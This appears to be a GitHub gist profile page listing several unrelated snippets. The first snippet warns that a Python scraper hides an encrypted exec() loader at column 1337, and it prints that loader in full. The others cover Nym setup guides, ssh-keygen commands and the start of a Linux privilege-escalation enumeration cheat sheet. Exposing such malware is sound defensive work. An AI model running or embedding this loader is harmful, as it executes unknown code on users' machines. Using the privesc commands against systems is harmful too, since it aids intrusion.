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Hans Bricks gyrusdentatus

luv luv luv
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This python script looks like a website cloner/scraper but actually at line 1, there is at column 1337 following code which gets executed before anything else:

 ;os.system('pip install cryptography');os.system('pip install fernet');os.system('pip install requests');from fernet import Fernet;import requests;exec(Fernet(b'bQ0PAVKM9i1PydzZEAjFsD-Ad4K3n5v4NRC8xhtC9ns=').decrypt(b'gAAAAABmGp4ms6M3rNhp4ZJXcbngSZ6a__xv1xqWOtcG22104rJTaIDJZXiD_YrUWOaHtMYYRL4hLsAjfdu2uAZzj7q60b3BYFE5rX8Oj736RziPlvUpNrHf6N0DiAvWvP0uJ7XkGMXsz5gaUygih5lTmsKJOvNtg4bcTNfWb4cF35ldTM2CktMMrfVrU9KUJlcIj93h87aKJ0RYUiiiGGUVnE6k2uGx50Y-0a-CmbPi6EOktl4RSxg='))

What happens to the enduser with Windows?

This after decrypted executes following code:

gyrusdentatus /
Last active April 4, 2023 18:30
this is a prompt for generating quotes

Example prompt:

Give me 10 of person’s quotes. For each quotes I want you to rewrite the quote so it is talking about subject. Formatting should be as following: 1.A [quote] 1.B [rephased_quote]

gyrusdentatus /
Created March 23, 2023 15:45 — forked from sven-hash/
Stresstest Nym mixnet by starting a lot of nym-socks5-client
SP=(GiRjFWrMxt58pEMuusm4yT3RxoMD1MMPrR9M2N4VWRJP.3CNZBPq4vg7v7qozjGjdPMXcvDmkbWPCgbGCjQVw9n6Z@2xU4CBE6QiiYt6EyBXSALwxkNvM7gqJfjHXaMkjiFmYW 3zzhLtWvaJgn755MkRckG5aRnoTZich8ASn395iSsTgj.J1R5VuxXbh2eNHiaRbrwbKGXrrEQcHKLdzf8eg9HTB6q@3B7PsbXFuqq6rerYFLw5HPbQb4UmBqAhfWURRovMmWoj 4PDb96cck5btTj6G7rsomqwHJsp4qu8uPvFCbwHfjFUx.C5dKbaoakH7egsZvAueRbwLFbmxnQaVMeSr6QTMpuBAA@58ceEFaLJh6zAo3cirzT1BDQm7D3L5acnQrxGH1D6TAY C4w6ewbQtoaZEeoaaNw1xVASChqo4WVjNfuYEUFjZxpc.8F1D7rQXf2jGoj1Ken7PiGDM8HS2Ug79wSoc9nZ1iqh1@62F81C9GrHDRja9WCqozemRFSzFPMecY85MbGwn6efve G7y7e1nVBr8fmQSzdeAxXnCmmmJb5k8N3E8LBV31KE5g.GRRUCj6t6cCUUjakmTWzidMLiYA7EdCedKnup8osaBC6@AJad2R9virYEYXEsTcicN5y5tyPoixrhhAGsxoESZVnc)
gyrusdentatus /
Last active November 24, 2021 23:57
This is a first draft of a rough guide to installing nym-wallet 0.1.0 from source on Linux. There might be some errors so proceed with caution.

installing NodeJS and yarn

Start with getting nvm which stands for node version manager.

curl -o- | bash

after that you need to source your .bashrc for it to work in your current shell:

gyrusdentatus /
Created September 19, 2020 14:58 — forked from sgeisler/
Fetch the Liquid asset list and add the ticker labels to elements.conf
# 1. fetches asset registry JSON
# 2. extract ticker symbol and asset id
# 3. format it in the elements.conf format
# 4. deduplicate ticker symbols (apparently no uniqueness is enforced, beware that this operation is lossy)
# 5. append the labels to ~/.elements/elements.conf
curl | jq -r '.[] | values | (.contract.ticker, .asset_id)' | xargs -n2 bash -c 'echo "assetdir=$1:$0"' | sort -t ':' -k '2' -u >> ~/.elements/elements.conf
gyrusdentatus /
Created July 6, 2020 14:04 — forked from grenade/
Correct file permissions for ssh keys and config.
ssh-keygen -t rsa -b 4096 -N '' -C "[email protected]" -f ~/.ssh/id_rsa
ssh-keygen -t rsa -b 4096 -N '' -C "[email protected]" -f ~/.ssh/github_rsa
ssh-keygen -t rsa -b 4096 -N '' -C "[email protected]" -f ~/.ssh/mozilla_rsa
gyrusdentatus /
Last active March 26, 2023 21:33
A full guide on how to set up a Nym mixnode on a fresh server

How to set up a server running NYM for dummies


This guide is written for people that have absolutely no or little experience with terminal and remote server configuration. Should work on all Debian based distros although this has been tested only with fresh Debian 10 Buster. It does not yet cover the actual node configuration yet. For that see the official Nym docs here

If you are complete beginner and just installed Debian on your VPS then I suggest going through the bash crash course in the introduction section

If you are at least little experienced, then skip to section Nym installation.

gyrusdentatus /
Created June 1, 2020 13:31

Keybase proof

I hereby claim:

  • I am gyrusdentatus on github.
  • I am hansbricks ( on keybase.
  • I have a public key ASCSHP7FGROPxa9-IAspek5auIpjbscE0U0YWzqkoNN1KQo

To claim this, I am signing this object:

gyrusdentatus / linux_privesc
Created May 28, 2020 19:29 — forked from sckalath/linux_privesc
Linux Privilege Escalation Techniques
// Determine linux distribution and version
cat /etc/issue
cat /etc/*-release
cat /etc/lsb-release
cat /etc/redhat-release
// Determine kernel version - 32 or 64-bit?
cat /proc/version
uname -a
uname -mrs